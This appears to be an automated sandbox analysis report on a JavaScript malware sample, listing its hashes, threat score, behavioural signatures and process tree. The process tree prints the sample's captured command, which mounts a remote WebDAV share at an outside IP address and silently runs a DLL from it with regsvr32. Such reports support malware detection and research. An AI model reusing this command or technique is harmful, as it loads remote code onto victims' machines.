Analysis
-
max time kernel
138s -
max time network
102s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
21/07/2024, 17:41
Static task
static1
Behavioral task
behavioral1
Sample
28499241435478958.js
Resource
win7-20240704-en
3 signatures
150 seconds
Behavioral task
behavioral2
Sample
28499241435478958.js
Resource
win10v2004-20240709-en
5 signatures
150 seconds
General
-
Target
28499241435478958.js
-
Size
5KB
-
MD5
e0acf6e19eb1e0f27f46caec63a861ba
-
SHA1
e6407b53ecd318cd5840622fb80dff6fca71ff5b
-
SHA256
92e551408dcfc7c44657c8e5fc4a56208994c9a7b1236dd13ee03dad8860f171
-
SHA512
71a8d8a37e56bb79af79ffe2d81577f7c6a5c813cf0fffa0dfa14a92c84f998ec92183016b1a20d597c994d640688e41f086d02c31fa55b8cfa8b9495097522f
-
SSDEEP
96:5dARpoUbB2VLuG30tKuBquGm2bGuTsMzbbAkROzbbT:5dAfbcVLN30tKyqNmsGkRzbbAkczbbT
Score
7/10
Malware Config
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 3604 wrote to memory of 1824 3604 wscript.exe 84 PID 3604 wrote to memory of 1824 3604 wscript.exe 84 PID 1824 wrote to memory of 3920 1824 cmd.exe 86 PID 1824 wrote to memory of 3920 1824 cmd.exe 86
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\28499241435478958.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3604 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k net use \\45.9.74.36@8888\davwwwroot\ && regsvr32 /s \\45.9.74.36@8888\davwwwroot\9721249505395.dll2⤵
- Suspicious use of WriteProcessMemory
PID:1824 -
C:\Windows\system32\net.exenet use \\45.9.74.36@8888\davwwwroot\3⤵PID:3920
-
-